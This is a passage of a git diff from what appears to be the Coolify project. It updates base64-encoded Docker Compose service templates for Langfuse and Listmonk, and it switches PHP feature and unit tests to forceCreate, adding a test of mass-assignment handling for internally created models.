9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAgICAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIC0gUkVESVNfSE9TVD1yZWRpcwogICAgICAtIFJFRElTX1BPUlQ9NjM3OQogICAgICAtICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAgICAgLSAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNy1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1oIGxvY2FsaG9zdCAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo4JwogICAgY29tbWFuZDoKICAgICAgLSBzaAogICAgICAtICctYycKICAgICAgLSAncmVkaXMtc2VydmVyIC0tcmVxdWlyZXBhc3MgIiRTRVJWSUNFX1BBU1NXT1JEX1JFRElTIicKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgdm9sdW1lczoKICAgICAgLSAnbGFuZ2Z1c2VfcmVkaXNfZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgICAgLSBQSU5HCiAgICAgIGludGVydmFsOiAzcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTAKICBjbGlja2hvdXNlOgogICAgaW1hZ2U6ICdjbGlja2hvdXNlL2NsaWNraG91c2Utc2VydmVyOjI2LjIuNC4yMycKICAgIHVzZXI6ICcxMDE6MTAxJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX2NsaWNraG91c2VfZGF0YTovdmFyL2xpYi9jbGlja2hvdXNlJwogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2xvZ3M6L3Zhci9sb2cvY2xpY2tob3VzZS1zZXJ2ZXInCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3dnZXQgLS1uby12ZXJib3NlIC0tdHJpZXM9MSAtLXNwaWRlciBodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "ai",
             "qdrant",
@@ -2502,7 +2518,7 @@
     "listmonk": {
         "documentation": "https://listmonk.app/?utm_source=coolify.io",
         "slogan": "Self-hosted newsletter and mailing list manager",
-        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9MSVNUTU9OS185MDAwCiAgICAgIC0gJ0xJU1RNT05LX2FwcF9fYWRkcmVzcz0wLjAuMC4wOjkwMDAnCiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fbmFtZT1saXN0bW9uawogICAgICAtIExJU1RNT05LX2RiX191c2VyPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcG9ydD01NDMyCiAgICAgIC0gVFo9RXRjL1VUQwogICAgdm9sdW1lczoKICAgICAgLSAnbGlzdG1vbmstZGF0YTovbGlzdG1vbmsvdXBsb2FkcycKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5MDAwJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIGxpc3Rtb25rLWluaXRpYWwtZGF0YWJhc2Utc2V0dXA6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGNvbW1hbmQ6ICcuL2xpc3Rtb25rIC0taW5zdGFsbCAtLXllcyAtLWlkZW1wb3RlbnQnCiAgICByZXN0YXJ0OiAnbm8nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fbmFtZT1saXN0bW9uawogICAgICAtIExJU1RNT05LX2RiX191c2VyPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcGFzc3dvcmQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBMSVNUTU9OS19kYl9fcG9ydD01NDMyCiAgcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE4LWFscGluZScKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPU1RHUkVTX0RCPWxpc3Rtb25rCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "c2VydmljZXM6CiAgbGlzdG1vbms6CiAgICBpbWFnZTogJ2xpc3Rtb25rL2xpc3Rtb25rOnY2LjAuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9MSVNUTU9OS185MDAwCiAgICAgIC0gJ0xJU1RNT05LX2FwcF9fYWRkcmVzcz0wLjAuMC4wOjkwMDAnCiAgICAgIC0gTElTVE1PTktfZGJfX2hvc3Q9cG9zdGdyZXMKICAgICAgLSBMSVNUTU9OS19kYl9fZGF0YWJhc2U9bGlzdG1vbmsKICAgICAgLSBMSVNUTU9OS19kYl9fdXNlcj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3Bhc3N3b3JkPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gTElTVE1PTktfZGJfX3BvcnQ9NTQzMgogICAgICAtIFRaPUV0Yy9VVEMKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xpc3Rtb25rLWRhdGE6L2xpc3Rtb25rL3VwbG9hZHMnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6OTAwMCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICBsaXN0bW9uay1pbml0aWFsLWRhdGFiYXNlLXNldHVwOgogICAgaW1hZ2U6ICdsaXN0bW9uay9saXN0bW9uazp2Ni4wLjAnCiAgICBjb21tYW5kOiAnLi9saXN0bW9uayAtLWluc3RhbGwgLS15ZXMgLS1pZGVtcG90ZW50JwogICAgcmVzdGFydDogJ25vJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIExJU1RNT05LX2RiX19ob3N0PXBvc3RncmVzCiAgICAgIC0gTElTVE1PTktfZGJfX2RhdGFiYXNlPWxpc3Rtb25rCiAgICAgIC0gTElTVE1PTktfZGJfX3VzZXI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wYXNzd29yZD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIExJU1RNT05LX2RiX19wb3J0PTU0MzIKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTgtYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfREI9bGlzdG1vbmsKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXMtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "newsletter",
             "mailing list",
diff --git a/tests/Feature/ApplicationHealthCheckApiTest.php b/tests/Feature/ApplicationHealthCheckApiTest.php
index 8ccb7c639..7f1b985ad 100644
--- a/tests/Feature/ApplicationHealthCheckApiTest.php
+++ b/tests/Feature/ApplicationHealthCheckApiTest.php
@@ -25,13 +25,13 @@
     $this->server = Server::factory()->create(['team_id' => $this->team->id]);
 
     StandaloneDocker::withoutEvents(function () {
-        $this->destination = StandaloneDocker::firstOrCreate(
-            ['server_id' => $this->server->id, 'network' => 'coolify'],
+        $this->destination = $this->server->standaloneDockers()->firstOrCreate(
+            ['network' => 'coolify'],
             ['uuid' => (string) new Cuid2, 'name' => 'test-docker']
         );
     });
 
-    $this->project = Project::create([
+    $this->project = Project::forceCreate([
         'uuid' => (string) new Cuid2,
         'name' => 'test-project',
         'team_id' => $this->team->id,
diff --git a/tests/Feature/ComposePreviewFqdnTest.php b/tests/Feature/ComposePreviewFqdnTest.php
index c62f905d6..62fc0f2d8 100644
--- a/tests/Feature/ComposePreviewFqdnTest.php
+++ b/tests/Feature/ComposePreviewFqdnTest.php
@@ -14,9 +14,10 @@
         ]),
     ]);
 
-    $preview = ApplicationPreview::create([
+    $preview = ApplicationPreview::forceCreate([
         'application_id' => $application->id,
         'pull_request_id' => 42,
+        'pull_request_html_url' => 'https://github.com/example/repo/pull/42',
         'docker_compose_domains' => $application->docker_compose_domains,
     ]);
 
@@ -38,9 +39,10 @@
         ]),
     ]);
 
-    $preview = ApplicationPreview::create([
+    $preview = ApplicationPreview::forceCreate([
         'application_id' => $application->id,
         'pull_request_id' => 7,
+        'pull_request_html_url' => 'https://github.com/example/repo/pull/7',
         'docker_compose_domains' => $application->docker_compose_domains,
     ]);
 
@@ -63,9 +65,10 @@
         ]),
     ]);
 
-    $preview = ApplicationPreview::create([
+    $preview = ApplicationPreview::forceCreate([
         'application_id' => $application->id,
         'pull_request_id' => 99,
+        'pull_request_html_url' => 'https://github.com/example/repo/pull/99',
         'docker_compose_domains' => $application->docker_compose_domains,
     ]);
 
diff --git a/tests/Feature/DatabaseEnvironmentVariableApiTest.php b/tests/Feature/DatabaseEnvironmentVariableApiTest.php
index f3297cf17..78e80483b 100644
--- a/tests/Feature/DatabaseEnvironmentVariableApiTest.php
+++ b/tests/Feature/DatabaseEnvironmentVariableApiTest.php
@@ -33,7 +33,7 @@
 
 function createDatabase($context): StandalonePostgresql
 {
-    return StandalonePostgresql::create([
+    return StandalonePostgresql::forceCreate([
         'name' => 'test-postgres',
         'image' => 'postgres:15-alpine',
         'postgres_user' => 'postgres',
diff --git a/tests/Feature/DatabasePublicPortTimeoutApiTest.php b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
index 6bbc6279f..1ffc32a81 100644
--- a/tests/Feature/DatabasePublicPortTimeoutApiTest.php
+++ b/tests/Feature/DatabasePublicPortTimeoutApiTest.php
@@ -33,7 +33,7 @@
 
 describe('PATCH /api/v1/databases', function () {
     test('updates public_port_timeout on a postgresql database', function () {
-        $database = StandalonePostgresql::create([
+        $database = StandalonePostgresql::forceCreate([
             'name' => 'test-postgres',
             'image' => 'postgres:15-alpine',
             'postgres_user' => 'postgres',
@@ -57,7 +57,7 @@
     });
 
     test('updates public_port_timeout on a redis database', function () {
-        $database = StandaloneRedis::create([
+        $database = StandaloneRedis::forceCreate([
             'name' => 'test-redis',
             'image' => 'redis:7',
             'redis_password' => 'password',
@@ -79,7 +79,7 @@
     });
 
     test('rejects invalid public_port_timeout value', function () {
-        $database = StandalonePostgresql::create([
+        $database = StandalonePostgresql::forceCreate([
             'name' => 'test-postgres',
             'image' => 'postgres:15-alpine',
             'postgres_user' => 'postgres',
@@ -101,7 +101,7 @@
     });
 
     test('accepts null public_port_timeout', function () {
-        $database = StandalonePostgresql::create([
+        $database = StandalonePostgresql::forceCreate([
             'name' => 'test-postgres',
             'image' => 'postgres:15-alpine',
             'postgres_user' => 'postgres',
diff --git a/tests/Feature/InternalModelCreationMassAssignmentTest.php b/tests/Feature/InternalModelCreationMassAssignmentTest.php
new file mode 100644
index 000000000..fc581bf5c
--- /dev/null
+++ b/tests/Feature/InternalModelCreationMassAssignmentTest.php
@@ -0,0 +1,73 @@
+<?php
+
+use App\Models\Application;
+use App\Models\ApplicationSetting;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\Team;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+it('creates application settings for internally created applications', function () {
+    $team = Team::factory()->create();
+    $project = Project::factory()->create([
+        'team_id' => $team->id,
+    ]);
+    $environment = Environment::factory()->create([
+        'project_id' => $project->id,
+    ]);
+    $server = Server::factory()->create([
+        'team_id' => $team->id,
+    ]);
+    $destination = $server->standaloneDockers()->firstOrFail();
+
+    $application = Application::forceCreate([
+        'name' => 'internal-app',
+        'git_repository' => 'https://github.com/coollabsio/coolify',
+        'git_branch' => 'main',
+        'build_pack' => 'nixpacks',
+        'ports_exposes' => '3000',
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+
+    $setting = ApplicationSetting::query()
+        ->where('application_id', $application->id)
+        ->first();
+
+    expect($application->environment_id)->toBe($environment->id);
+    expect($setting)->not->toBeNull();
+    expect($setting?->application_id)->toBe($application->id);
+});
+
+it('creates services with protected relationship ids in trusted internal paths', function () {
+    $team = Team::factory()->create();
+    $project = Project::factory()->create([
+        'team_id' => $team->id,
+    ]);
+    $environment = Environment::factory()->create([
+        'project_id' => $project->id,
+    ]);
+    $server = Server::factory()->create([
+        'team_id' => $team->id,
+    ]);
+    $destination = $server->standaloneDockers()->firstOrFail();
+
+    $service = Service::forceCreate([
+        'docker_compose_raw' => 'services: {}',
+        'environment_id' => $environment->id,
+        'server_id' => $server->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+        'service_type' => 'test-service',
+    ]);
+
+    expect($service->environment_id)->toBe($environment->id);
+    expect($service->server_id)->toBe($server->id);
+    expect($service->destination_id)->toBe($destination->id);
+    expect($service->destination_type)->toBe($destination->getMorphClass());
+});
diff --git a/tests/Feature/ServiceDatabaseTeamTest.php b/tests/Feature/ServiceDatabaseTeamTest.php
index 97bb0fd2a..ae3cba4d3 100644
--- a/tests/Feature/ServiceDatabaseTeamTest.php
+++ b/tests/Feature/ServiceDatabaseTeamTest.php
@@ -7,25 +7,26 @@
 use App\Models\ServiceDatabase;
 use App\Models\Team;
 use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Str;
 
 uses(RefreshDatabase::class);
 
 it('returns the correct team through the service relationship chain', function () {
     $team = Team::factory()->create();
 
-    $project = Project::create([
-        'uuid' => (string) Illuminate\Support\Str::uuid(),
+    $project = Project::forceCreate([
+        'uuid' => (string) Str::uuid(),
         'name' => 'Test Project',
         'team_id' => $team->id,
     ]);
 
-    $environment = Environment::create([
-        'name' => 'test-env-'.Illuminate\Support\Str::random(8),
+    $environment = Environment::forceCreate([
+        'name' => 'test-env-'.Str::random(8),
         'project_id' => $project->id,
     ]);
 
-    $service = Service::create([
-        'uuid' => (string) Illuminate\Support\Str::uuid(),
+    $service = Service::forceCreate([
+        'uuid' => (string) Str::uuid(),
         'name' => 'supabase',
         'environment_id' => $environment->id,
         'destination_id' => 1,
@@ -33,8 +34,8 @@
         'docker_compose_raw' => 'version: "3"',
     ]);
 
-    $serviceDatabase = ServiceDatabase::create([
-        'uuid' => (string) Illuminate\Support\Str::uuid(),
+    $serviceDatabase = ServiceDatabase::forceCreate([
+        'uuid' => (string) Str::uuid(),
         'name' => 'supabase-db',
         'service_id' => $service->id,
     ]);
@@ -46,19 +47,19 @@
 it('returns the correct team for ServiceApplication through the service relationship chain', function () {
     $team = Team::factory()->create();
 
-    $project = Project::create([
-        'uuid' => (string) Illuminate\Support\Str::uuid(),
+    $project = Project::forceCreate([
+        'uuid' => (string) Str::uuid(),
         'name' => 'Test Project',
         'team_id' => $team->id,
     ]);
 
-    $environment = Environment::create([
-        'name' => 'test-env-'.Illuminate\Support\Str::random(8),
+    $environment = Environment::forceCreate([
+        'name' => 'test-env-'.Str::random(8),
         'project_id' => $project->id,
     ]);
 
-    $service = Service::create([
-        'uuid' => (string) Illuminate\Support\Str::uuid(),
+    $service = Service::forceCreate([
+        'uuid' => (string) Str::uuid(),
         'name' => 'supabase',
         'environment_id' => $environment->id,
         'destination_id' => 1,
@@ -66,8 +67,8 @@
         'docker_compose_raw' => 'version: "3"',
     ]);
 
-    $serviceApplication = ServiceApplication::create([
-        'uuid' => (string) Illuminate\Support\Str::uuid(),
+    $serviceApplication = ServiceApplication::forceCreate([
+        'uuid' => (string) Str::uuid(),
         'name' => 'supabase-studio',
         'service_id' => $service->id,
     ]);
diff --git a/tests/Feature/StorageApiTest.php b/tests/Feature/StorageApiTest.php
index 75357e41e..bd9d727c4 100644
--- a/tests/Feature/StorageApiTest.php
+++ b/tests/Feature/StorageApiTest.php
@@ -49,7 +49,7 @@ function createTestApplication($context): Application
 
 function createTestDatabase($context): StandalonePostgresql
 {
-    return StandalonePostgresql::create([
+    return StandalonePostgresql::forceCreate([
         'name' => 'test-postgres',
         'image' => 'postgres:15-alpine',
         'postgres_user' => 'postgres',
diff --git a/tests/Unit/ServiceParserImageUpdateTest.php b/tests/Unit/ServiceParserImageUpdateTest.php
index b52e0b820..526505098 100644
--- a/tests/Unit/ServiceParserImageUpdateTest.php
+++ b/tests/Unit/ServiceParserImageUpdateTest.php
@@ -7,22 +7,24 @@
  * These tests verify the fix for the issue where changing an image in a
  * docker-compose file would create a new service instead of updating the existing one.
  */
-it('ensures service parser does not include image in firstOrCreate query', function () {
+it('ensures service parser does not include image in trusted service creation query', function () {
     // Read the serviceParser function from parsers.php
     $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
-    // Check that firstOrCreate is called with only name and service_id
-    // and NOT with image parameter in the ServiceApplication presave loop
+    // Check that trusted creation only uses name and service_id
+    // and does not include image in the creation payload
     expect($parsersFile)
-        ->toContain("firstOrCreate([\n                'name' => \$serviceName,\n                'service_id' => \$resource->id,\n            ]);")
-        ->not->toContain("firstOrCreate([\n                'name' => \$serviceName,\n                'image' => \$image,\n                'service_id' => \$resource->id,\n            ]);");
+        ->toContain("\$databaseFound = ServiceDatabase::where('name', \$serviceName)->where('service_id', \$resource->id)->first();")
+        ->toContain("\$applicationFound = ServiceApplication::where('name', \$serviceName)->where('service_id', \$resource->id)->first();")
+        ->toContain("forceCreate([\n                        'name' => \$serviceName,\n                        'service_id' => \$resource->id,\n                    ]);")
+        ->not->toContain("forceCreate([\n                        'name' => \$serviceName,\n                        'image' => \$image,\n                        'service_id' => \$resource->id,\n                    ]);");
 });
 
 it('ensures service parser updates image after finding or creating service', function () {
     // Read the serviceParser function from parsers.php
     $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
-    // Check that image update logic exists after firstOrCreate
+    // Check that image update logic exists after the trusted create/find branch
     expect($parsersFile)
         ->toContain('// Update image if it changed')
         ->toContain('if ($savedService->image !== $image) {')
